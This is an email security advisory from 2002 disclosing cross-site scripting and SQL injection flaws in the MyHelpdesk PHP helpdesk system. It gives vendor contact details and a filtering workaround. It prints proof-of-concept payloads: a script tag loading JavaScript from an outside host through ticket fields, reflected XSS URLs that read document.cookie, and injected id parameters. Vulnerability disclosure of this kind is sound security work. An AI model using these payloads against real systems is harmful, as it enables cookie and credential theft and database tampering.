Date: 10 Jun 2002 11:50:47 -0000
From: Ahmet Sabri ALPER <[email protected]>
To: [email protected]Subject: [ARL02-A15] Multiple Security Issues in MyHelpdesk
+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\------- Security Advisory -----/---------/+
+/----------\------ ID: ARL02-A15 ----/----------/+
+/-----------\----- [email protected] ---/-----------/+
Advisory Information
--------------------
Name : Multiple Security Issues in MyHelpdesk
Software Package : MyHelpdesk
Vendor Homepage : http://myhelpdesk.sourceforge.net/
Vulnerable Versions: v20020509 and older
Platforms : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted : 01/06/2002
Vendor Replied : 02/06/2002
Prior Problems : N/A
Current Version : v20020509 (vulnerable)
Summary
-------
MyHelpdesk is a PHP/MySQL Helpdesk system based on the
OneOrZero Helpdesk but with a different set of features.
The system is appropriate for the Support Desk of small
organizations.
Multiple Cross Site Scripting and SQL injection problems
exist within "MyHelpdesk".
Details
-------
1. When a support assistant creates a new ticket, the Title
and Description input is not filtered for malicious code,
therefore they allow Cross Site Scripting attacks, which may
provide any supporter, the administrator password if the issue
is exploited correctly.
Proof-of-concept input for Title and/or Description fields:
<script src="http://forum.olympos.org/f.js">Alper</script>
2. Maliciously crafted links from third party sites may allow
Cross Site Scripting attacks. This can be accomplished via three
different functions of index.php:
http://[TARGET]/supporter/index.php?t=tickettime&id=<script>alert
(document.cookie)</script>
http://[TARGET]/supporter/index.php?t=ticketfiles&id=<script>alert
(document.cookie)</script>
http://[TARGET]/supporter/index.php?t=updateticketlog&id=<script>alert
(document.cookie)</script>
3. Also when any ticket is edited, the update section
also is not filtered correctly and may carry malicious code.
4. Three different functions of the "index.php" allows passage
of user input directly to the SQL query. This makes it possible
for attackers to launch SQL injection attacks.
http://[TARGET]/supporter/index.php?t=detailticket&id=root%20me
http://[TARGET]/supporter/index.php?t=editticket&id=got%20root
http://[TARGET]/supporter/index.php?t=updateticketlog&id=without%20me
Solution
--------
The vendor stated in his reply that MyHelpDesk was
designed for internal use for small organizations, and
such issues would not do much harm for internal
systems.
Workaround;
Filter the $id, $title, $description variables for
malicious code.
Credits
-------
Discovered on 01, June, 2002 by
Ahmet Sabri ALPER <[email protected]>
ALPER Research Labs.
The ALPER Research Labs. [ARL] workers are freelancer
security professionals and WhiteHat hackers. The ARL
workers are available for hiring for legal jobs.
The ARL also supports Open Software Community, by detecting
possible security issues in GPL or any other Public Licensed
product.
References
----------
Product Web Page: http://myhelpdesk.sourceforge.net/
Olympos: http://www.olympos.org/
